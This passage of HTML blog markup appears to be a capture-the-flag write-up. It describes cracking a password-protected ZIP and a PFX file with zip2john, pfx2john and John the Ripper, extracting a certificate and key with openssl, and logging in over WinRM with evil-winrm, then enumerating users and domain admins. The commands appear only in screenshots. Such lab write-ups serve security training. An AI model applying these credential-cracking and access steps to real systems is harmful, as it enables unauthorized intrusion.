target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACe0lEQVR42k1T63KiUBjjUbZqEVQEuauAgPdure22253Z93+PbPIx7eyPzOGak+TLcbzkAK/8wLT8xDQ5o+lfcL39xeH6idOT8Afd6RcmswLjaY6JV/yH0jAW/AFO2dxQ71+RV1dU7Q3d4Y2kr6i7F2TrC+L8gFW2xyrtMZ2v8eBmRjygwMgt8KCVGxhhlHZYrhosohp+sIU7KzGdreHNN5gFFbzFBsFqh3lY83qLMOnsfras+U+LxapFEHfwlpWROl8fTzztmH1j5A4YE0v+8GOScsMK+9MH1d+Rby6o2zsdvaM//0ZcHKk0h7MgWb4+ccetEXm0JYWCOy9NcUAVup9RRbG9IC1PFoNWxZKWF8zC3aAwjFtTGCaUHjUIqWZAyyh2tNUYYZT0pnTJ54toZ+s8bOzZyM2ZbW7DceJ8j4gvV8xSmY0eM0y+Q88tCmWra5cqV9nBSL7IElqN+UyZakjOjKFHVBLQTsCPZHn0mFp2BsagnEUcUmXdvmDTPCMtTljXPy3Pls3QRlLq+CQIaHnBDAPL80y1e9odIlAcsqc2KLeI74a1tw1EpOk/+qV108nLI4QNe5gVB1TsZV6ezf5Qn7VZVgdVIW2gd5q4T1eyrigm/lB2syxIoc+Jjh8TjCaJ2VWWggYjy/OwouUbyurJCl9sr2a72t1MsWrmrFjUbn9Hs3tGuTkj4Ys5yV0dJZFy14BTLflzd3yzEySoh7v9m2XaH98tpoGQ+fQMtevv2Ono8Rhu6ycUzFJEOjE+M1ryes3nX0gYj9RJ5ZYKU8akJjgurUzpX6vPIicZg6bqWEOgWpFqQOqk+hlzIDp+GpK6q9rZIVCOXoF/DrfFcvCiZrkAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="smbclient Shares" title="" src="/static/7fb0a85a43076052eecd3865e8492d0f/50637/smbclient-shares.png" srcset="/static/7fb0a85a43076052eecd3865e8492d0f/dda05/smbclient-shares.png 158w, /static/7fb0a85a43076052eecd3865e8492d0f/679a3/smbclient-shares.png 315w, /static/7fb0a85a43076052eecd3865e8492d0f/50637/smbclient-shares.png 630w, /static/7fb0a85a43076052eecd3865e8492d0f/0c7b9/smbclient-shares.png 657w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I downloaded both folders. <code class="language-text">HelpDesk</code> contained some documentation and an installer file for setting up LAPS, there wasn't any useful sensitive data, but it was an indication that LAPS was being used on the system. <code class="language-text">Dev</code> contained <code class="language-text">winrm_backup.zip</code> which required a password to access:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 468px; " > <a class="gatsby-resp-image-link" href="/static/f9488af9e2fcdae29fa78a43abe667ba/cd23f/zip-password-required.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8UlEQVR42lWOy07CUABE+RKjtRVEkD5oe/vWcukLsQUE3ZiUlRv/f3u87c7FZCaZZOZMdGePvu7Q7JbbZYG2CDE9SSYPiHRHtGnZNBdeyyPxpiMrDkT5nqkZoz163M/9f5rM4k+M4ExU9dTHH+TbF+3Hle/+l+5ypT33WOpgHRZYYoufNmPWFwF3M1eNuqMPGgcz2eEISZq/I8sThaLJixOyvpAoOqEG9LnAWAimzyEPy1DlgNkq5snJmFspKy8fNYxOvLDGjypE0mD7iiCqMd2cINnhJzWu6gYiO9jiKHfjSpEq4qgcz4YuK468KN0YNn8Exof/gGka0wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="zip password required" title="" src="/static/f9488af9e2fcdae29fa78a43abe667ba/cd23f/zip-password-required.png" srcset="/static/f9488af9e2fcdae29fa78a43abe667ba/dda05/zip-password-required.png 158w, /static/f9488af9e2fcdae29fa78a43abe667ba/679a3/zip-password-required.png 315w, /static/f9488af9e2fcdae29fa78a43abe667ba/cd23f/zip-password-required.png 468w" sizes="(max-width: 468px) 100vw, 468px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">zip2john</code> to process the ZIP into a hash that <code class="language-text">JtR</code> could work with:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/31e2e6c215dd626290b0784845dfb7dd/d5403/zip2john-winrm-backup.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.759493670886075%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhUlEQVR42h2NSQ6CMABFuQxgtDhAsLQMxbIACiEE48LE+1/jWVi8/GHxfxCnlkhunNQbbVeG5Ytbf9jxQ9tvB3fZcXt2nB81oVBEiSa+aq/qyKEoiL3fCTLVk+sBbWZKj6xGZO0o7UJeOQozodoZ/ZoPv4+LzPgDi0gNF38i0obEd0nW8AdS2ENm99qd1wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="zip2john winrm_backup.zip" title="" src="/static/31e2e6c215dd626290b0784845dfb7dd/50637/zip2john-winrm-backup.png" srcset="/static/31e2e6c215dd626290b0784845dfb7dd/dda05/zip2john-winrm-backup.png 158w, /static/31e2e6c215dd626290b0784845dfb7dd/679a3/zip2john-winrm-backup.png 315w, /static/31e2e6c215dd626290b0784845dfb7dd/50637/zip2john-winrm-backup.png 630w, /static/31e2e6c215dd626290b0784845dfb7dd/d5403/zip2john-winrm-backup.png 739w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">JtR</code> cracked the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2d686bdcfe44d31f45072f2abda543f0/a7269/zip-password-cracked.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVR42kWQaXKDMAxGuUpDKGtSVmPjhSWEJaFr7n+Wr8KTTn+8sS1bT5Idv7wiEA/iCxGfILob1PQNvT6glh9U/Qa/MPBShaTqwdsbmF4tpZwRvEkcwgrHiFmc2rzTow3c3CGHDzC1kHRDqVbkzQzv1OAlZESNQ1TDSwReKeafpd27FHNJ5P4J9d6RmaGosh4+ofs7dEsy1oM1I5i4oOADSjHQ2iOrR+pK4RhzK/yHUyEOx5BAqgmckrNqAJeTlXB5RS1HCEXoGQ0VFURFE2R8RLrDLkiKFqeyQ5JrnGl19lEzNqJsFjC50EWHINX0sEOYGfjUTUjnKG8RU8wmPyVxbuyo+x+6T34By4ektue/KNQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="winrm_backup.zip password cracked" title="" src="/static/2d686bdcfe44d31f45072f2abda543f0/50637/zip-password-cracked.png" srcset="/static/2d686bdcfe44d31f45072f2abda543f0/dda05/zip-password-cracked.png 158w, /static/2d686bdcfe44d31f45072f2abda543f0/679a3/zip-password-cracked.png 315w, /static/2d686bdcfe44d31f45072f2abda543f0/50637/zip-password-cracked.png 630w, /static/2d686bdcfe44d31f45072f2abda543f0/a7269/zip-password-cracked.png 740w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I was then able to unzip the archive which contained <code class="language-text">legacyy_dev_auth.pfx</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 428px; " > <a class="gatsby-resp-image-link" href="/static/c313ec60472c8bbeceab41d9ffa98dd5/ce704/unzip-winrm-backup.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHklEQVR42lVQ7VKCQBTlTSwpESM1QFhgQYRFRNQlUNNppmaafvj+L3C6bk1TP87cmb17vq42eMqh21voToPetEbPyqA/BnDDFfhiBz9Zg2c7ZNUBiZCIxTNBIky3GNkJ+qYHfeT/QjOCDkZ8hhG9IJMXCPmBvD7i8HrB+e2C9vQJuX+HG5XweIkZrxCkGzAyMiYRboezf6JatGjIbQPLTiHKFnnZoaiOyMo9FstOpfP4CjcDl8hEfGCKeEcYUJPhhMOcxri3gm/BK1EQ5qJFWrRgcQ2xOsALS4j6hCRvlGicS3DC9QRXAydcqrRsvkZEe8tJVVLNYQVcRnUi+uTlGLsZiUg4bElvFeygUPd0aXpxBWMcov9Ts2/6av6t/QUqBqndC45GRwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="unzip-winrm-backup" title="" src="/static/c313ec60472c8bbeceab41d9ffa98dd5/ce704/unzip-winrm-backup.png" srcset="/static/c313ec60472c8bbeceab41d9ffa98dd5/dda05/unzip-winrm-backup.png 158w, /static/c313ec60472c8bbeceab41d9ffa98dd5/679a3/unzip-winrm-backup.png 315w, /static/c313ec60472c8bbeceab41d9ffa98dd5/ce704/unzip-winrm-backup.png 428w" sizes="(max-width: 428px) 100vw, 428px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A PFX (Personal Information Exchange) file is used to store a variety of cryptographic data (e.g., private keys, public key certificates, etc.) and since <code class="language-text">legacyy_dev_auth.pfx</code> was located in a ZIP called <code class="language-text">winrm_backup.zip</code>, it could be assumed that the PFX was storing an SSL private key and certificate that could be used to login to the machine given that WinRM supports authentication using a PFX.</p> <p>In order to use the PFX to authenticate, the private key and certificate must be extracted into PEM format which required a password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c6b4da374da1e69fc0d3b1b16d1eeb72/31682/pfx-password-required.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgUlEQVR42iXMSQ6CMABAUS4DSaFYBqXMiqSMcUEiUe9/kG/FxcvffUfEHUJv1hOlF/J6Zph31seHaX0xLW/MtBOoFleWeD9hiYzaQ6Aa2yuh5Z8aHJV0xHog0YYsN+hy5G42zllPnN6I0o7k0iNkhRsUeH6Ba/1HrZ3UBxk1iLDiCyejQjGxkWl6AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PFX password required" title="" src="/static/c6b4da374da1e69fc0d3b1b16d1eeb72/50637/pfx-password-required.png" srcset="/static/c6b4da374da1e69fc0d3b1b16d1eeb72/dda05/pfx-password-required.png 158w, /static/c6b4da374da1e69fc0d3b1b16d1eeb72/679a3/pfx-password-required.png 315w, /static/c6b4da374da1e69fc0d3b1b16d1eeb72/50637/pfx-password-required.png 630w, /static/c6b4da374da1e69fc0d3b1b16d1eeb72/31682/pfx-password-required.png 670w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">pfx2john</code> to convert the PFX into a compatible hash for <code class="language-text">JtR</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 510px; " > <a class="gatsby-resp-image-link" href="/static/2e513d5f9dc982c4502546792b4afdca/804c1/pfx2john-legacyy-dev-auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 10.126582278481013%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgUlEQVR42i3M4Q5CUABAYQ+TK2tFDLdSE7qu7mgrYt7/PU5GP77t/DqW46eIuMVOemw54sYN4UWhzLjQ7UT9mijMdzaQ6Q/icMaZif3K+dvsJJbwbojIsI2e2KEmvjbzaCCvOu7qTVH3FLpDZg2eVKR5SyAfCz8pOcqS4LS266f8AJWtRJDJrui4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pfx2john legacyy_dev_auth.pfx" title="" src="/static/2e513d5f9dc982c4502546792b4afdca/804c1/pfx2john-legacyy-dev-auth.png" srcset="/static/2e513d5f9dc982c4502546792b4afdca/dda05/pfx2john-legacyy-dev-auth.png 158w, /static/2e513d5f9dc982c4502546792b4afdca/679a3/pfx2john-legacyy-dev-auth.png 315w, /static/2e513d5f9dc982c4502546792b4afdca/804c1/pfx2john-legacyy-dev-auth.png 510w" sizes="(max-width: 510px) 100vw, 510px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">JtR</code> cracked the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a4b45bca857bfc371f2d3fb0c6a80212/adb42/pfx-password-cracked.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABNUlEQVR42j1Q6XKCMBj0VVp1KkQUkCSQcMipIGM7vv+7bDfp8WMn17dXNoGcIOwLgXlC5ANkc4cdnijGL+Rck/KOfVJhezII0hqmXXExEzJ7hyxn7kfshMI2kNiFCpu8XmGaFfa6omyf0BQo6gVF84CqFsS6h/bnlQIUoVBmb0hoHjvwPZINPmjoBavhBWlm6OrhSXn9QFqMJC90v3E/eXFZzXxbEGVXokWiB4ikhmDqI3GSvL/U2JhmQW5HxKqj+wxlBmieo7REQucobRCSGLL24VySdPVp3g4S74H6hfTYuoQFyU09kdziLDvYaoIuOmjT06iHspOv6KrF+qfiWfVMxHmGONLAhYlV65NuyvYTGatpViz4Z6esYxpXq4PgcMghl+pP4F+M5q7+Tmjsjw459kLjG1Otx0rXIVYWAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="legacyy_dev_auth.pfx password cracked" title="" src="/static/a4b45bca857bfc371f2d3fb0c6a80212/50637/pfx-password-cracked.png" srcset="/static/a4b45bca857bfc371f2d3fb0c6a80212/dda05/pfx-password-cracked.png 158w, /static/a4b45bca857bfc371f2d3fb0c6a80212/679a3/pfx-password-cracked.png 315w, /static/a4b45bca857bfc371f2d3fb0c6a80212/50637/pfx-password-cracked.png 630w, /static/a4b45bca857bfc371f2d3fb0c6a80212/adb42/pfx-password-cracked.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Now that I had the password for the PFX , I was able to use <code class="language-text">openssl</code> to extract the private key and certificate into PEM format:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2490a476a85790f1ada7ebd32cd121ee/70582/extract-private-key-and-cert.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVR42lWQ2W6DMBBF+ZFKaQphCftqcNgChUKWhqhqWvX/v+N2bCUPebi6ljw6nmNFzRao6RVm1CFkLer+jPH8i+H0g27+Rn+8wU1aqE4OzeWyDX8HK6hgeiUsn9qnDkpoNoPC+i+wbsGuu6AdPhGwDqz8QMxFRqTlBCcmoMehUVS3gEkwL9nDjmpKAzusaabBRgCL+oi4GBHmIzidw3QP3SngUatWhhc1wEqPsTZTrI0Ub7ITvN6z0kXH1BHNJFC07AqNlLfZhIjAzbBguvxJ7f5ww7tQFvCHMm0oN6VHDVLdhhUMbyeVdbpTfH5CwGdk5QE5bSg2Y9UsdZ+U7yCRDf3hQ90ldQGzIwHm+AdGPKQcdDiPzQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="extract private key and cert" title="" src="/static/2490a476a85790f1ada7ebd32cd121ee/50637/extract-private-key-and-cert.png" srcset="/static/2490a476a85790f1ada7ebd32cd121ee/dda05/extract-private-key-and-cert.png 158w, /static/2490a476a85790f1ada7ebd32cd121ee/679a3/extract-private-key-and-cert.png 315w, /static/2490a476a85790f1ada7ebd32cd121ee/50637/extract-private-key-and-cert.png 630w, /static/2490a476a85790f1ada7ebd32cd121ee/70582/extract-private-key-and-cert.png 689w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> made a connection using the certificate (<code class="language-text">legacyy_cert.pem</code>) and private key (<code class="language-text">legacyy_private_key.pem</code>) as the user <code class="language-text">legacyy</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2bf4c18fca53201b80948da78c0cafca/adb42/evil-winrm-legacyy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 63.92405063291139%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACGklEQVR42oWT6XabMBSEeZQ0BrNJQhtiMWCD7aZJur3/y0wHkh7XbU/74zuDJWs0urqKUnPC3n9GQgp3wrR8wfH8DeP8lfp9Q5ojpD0iUwcoqqioZoTQE+dOSMoeu7wlDaLH6oqdeSYviNUM4a4QZkGqJih/QRheUdoFVX3GXg7Q9RUVx3X9kfNXqMD1NHzIWjwkFtHB1Rj8Gz2/O+MwWLupUxa90cRCCQerPMccPNHSw1AD/+dNgNfrnEJUaxpZj1VbU2PyAaNv+N0i6AZT3aCzHfKiR1F0KJmmFAcU5RtCUkWPvOyQZQZRJRfIcoEiUpyY5IosZ12yA+nJiDSfaLjqgIyaFdON8riRlhOSlDVsGDeYBk536FyAki3ivCdUJoqZbCPvsMvCLzR4/El+I9pLulczOSOVVCaOuXNcDIi5a8zdYzHT8ICYi2MW/6a82ZX8RtT4Ey9kxtwcMQxX+Ja3p0dU9kSmtzbhb+OXzWiXhnfD30zfiXr21MiiPrke02GBa57Q9s/ohpeNfnqFYctIfdxM1967N703jorUoypaEiBlz0XnbaFjf1kaaabPuGHC4+xZ01Xvze6No4QFVnwJZTWiYAsIteqAkioq3i7HPiQOj/v6L8n+JDJ8bjsuiPd+Q6gBrr4w4QUpk3+IHSo3wzd8Fazr/0w3w5QfaR6geQF1c9kSh+4TCprvEr8deT2+DWcm7v9p+ANZKZnaR8dXlwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm connection as legacyy" title="" src="/static/2bf4c18fca53201b80948da78c0cafca/50637/evil-winrm-legacyy.png" srcset="/static/2bf4c18fca53201b80948da78c0cafca/dda05/evil-winrm-legacyy.png 158w, /static/2bf4c18fca53201b80948da78c0cafca/679a3/evil-winrm-legacyy.png 315w, /static/2bf4c18fca53201b80948da78c0cafca/50637/evil-winrm-legacyy.png 630w, /static/2bf4c18fca53201b80948da78c0cafca/adb42/evil-winrm-legacyy.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As part of the enumeration process, first I checked group membership for <code class="language-text">legacyy</code> as well as the user's privileges, but there wasn't anything too useful:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 545px; " > <a class="gatsby-resp-image-link" href="/static/81974b485e1a26a24925f377952e614f/084e3/net-user-legacyy.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACh0lEQVR42m1U13LiQBDkU2xsQAIllHMmOfvqXHUv/v/PmOse4eyHqVWxu70dZpilQSuZ30gXD9JGjTRFJ0V7L0V9K17QS5QdZBuNEiQ78eNR3KATx+909cJB9w2rkKtVItdGKrMUF7PmVqrhWRabTBbrHAewmolcXAey2uTSYC9K93K5CGW+jFDxeZ3qypjAFLDuHmV/epG8uhHLLWW5TnAoxGaMSmSJRwIwc7YNWOA3MNH1DcRMPr6VYXGSpDhKnB+kG58hr1c5BLxaRbK2S3H9FjJb8SGd8v14J5bXnGV+AyyaOwXSdfdHwnQHlqlKnkOiC7/q/lFMu1D5hpWrZwsz/cT0A3TmhT1eHJTVNuyUzbVKA0P4Y9o5AhnFhmQTbAnGlQz5wFdQAMb5UVowTCGbPmblDWQWCsay3Fqq7kESWMLHXU2419Rpx3eWM4LdP79KPz7J6faf3D2+4vJRJROQAMPhLwAGBaSXngLuZe38AkiZAQ566MUIr8bZHhc6bROTnm0KBb1E8gyJAJ/rq4cAJECSAQhhhPQSXpHhap1pKJRle7WmTtZTpVrfwRSwh+R+eJIRCTfdvRi4YCLJBQ+Aga5GrL05MZyKDf0rYIYwMhheYmJiSCbgxXz7njQBGcwWvpGphdp4pXq5hIofgAFkUmpeHsXxqnPVCsRQKNk/T4rlVrJBrZ0CbVRrvxJE5Z8nZmbjAH2zAWQhNR8hMaAlZcJDA8Gwjfj9zvrsJW1gccbfAoLkkxToP0quMC3jnl4+SMfpgJcmGnk8vOg+555723BqIQ6Eg38rKqAVBJ2l8I+ADCYHeIe1BVhRYsa1Aw4KxFbaOJU+Qivmi6npOUGu7pVgH8l/A6cBqh/NWskAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user legacyy" title="" src="/static/81974b485e1a26a24925f377952e614f/084e3/net-user-legacyy.png" srcset="/static/81974b485e1a26a24925f377952e614f/dda05/net-user-legacyy.png 158w, /static/81974b485e1a26a24925f377952e614f/679a3/net-user-legacyy.png 315w, /static/81974b485e1a26a24925f377952e614f/084e3/net-user-legacyy.png 545w" sizes="(max-width: 545px) 100vw, 545px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 595px; " > <a class="gatsby-resp-image-link" href="/static/ace0f2d6a9cf90986a42736009e61efe/54787/whoami-priv.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 30.37974683544304%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLUlEQVR42lVQ2XLCMAzMrzQphKZADjsODgHbObnKlELLTP//P7ay0+mUhx3Jkna1sseTDURSYcs01mwNWRqU6oQ0r8Fkj6xowVadiwk3Lo8pLjKN4KX4hSDkCGY5vFQ0I4HI6aqHqPbIywHhXMIP7ZB4gK35RPRDhiDkFDOHYDpGb5EpZKJ2W2Neg5O4XTCbl48i/8VJyLoJwtHVUyhGl9bhkilw2REG5OQyJKHJq8SUYPOYmb8l0bLCJFq53jQa+xF9WZIbPM8YfHLpbeoz+uMd7f4Tze4K1bw7aMIiVZDbE7r9F+rhBtNf3f9W5oya8pSuSrhGf7iDFx1dUcCr9Bva4epIDQ2Z7oPeN5SbIxLWoFJnVy/WO2jq2XnVXGDaC7nXYMWA7vANIXdO8AfCncVtJc1BcwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="whoami /priv" title="" src="/static/ace0f2d6a9cf90986a42736009e61efe/54787/whoami-priv.png" srcset="/static/ace0f2d6a9cf90986a42736009e61efe/dda05/whoami-priv.png 158w, /static/ace0f2d6a9cf90986a42736009e61efe/679a3/whoami-priv.png 315w, /static/ace0f2d6a9cf90986a42736009e61efe/54787/whoami-priv.png 595w" sizes="(max-width: 595px) 100vw, 595px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">C:\Users</code> directory showed a few additional users on the system: <code class="language-text">Administrator</code>, <code class="language-text">svc_deploy</code>, and <code class="language-text">TRX</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cd05f56a71506677ef9de3c2323aabbf/80335/users-directory.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.24050632911392%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABUUlEQVR42m2S2XaCMBRF8yutgoR5CoQwBFFrbV2dXvr/X3J6E1xSax/OCmSRfXfuhal8gC5HTMWIXTtg3H2g1WeU8smmqPeUA6JMw4978KjH2qsvkViZ8CUs8iViXiPhFfKkRpxrypYOtlhtBB6cEo+uoOfqmjvgLyhbeRWifERSbuFFnTUJ04EgJR2o4PB6AfwD/GvJvLCBF8xx/RobWn0Cm9XE4dIeNusmUPBCZZ8X8K0lq9SRPpTWyCEjlzYF9a7pTpCUMOnp2sKaV+qZ9l8QpRouwV2/uYOyXOwQUL8e1wWkOmG7/4LqX5FSH7vxDZmYbB+NlSmqhjMN7hNpOdkhzabyGlaTTRgbYG6rH0/f0NM7crG38FIeCFhcgAINFdP0Jxhj8770czZlYdzBo0mvqbpPpsY4LWhAdKWsmBAknZ22OWBsomwED1vbz1vYnB+Q2vveGjq90wAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="C:\Users directory" title="" src="/static/cd05f56a71506677ef9de3c2323aabbf/50637/users-directory.png" srcset="/static/cd05f56a71506677ef9de3c2323aabbf/dda05/users-directory.png 158w, /static/cd05f56a71506677ef9de3c2323aabbf/679a3/users-directory.png 315w, /static/cd05f56a71506677ef9de3c2323aabbf/50637/users-directory.png 630w, /static/cd05f56a71506677ef9de3c2323aabbf/80335/users-directory.png 652w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">Administrator</code> and <code class="language-text">TRX</code> were both members of Domain Admins:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/281e9b30a83e91c2994ac44b94ca7524/80335/list-domain-admins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: 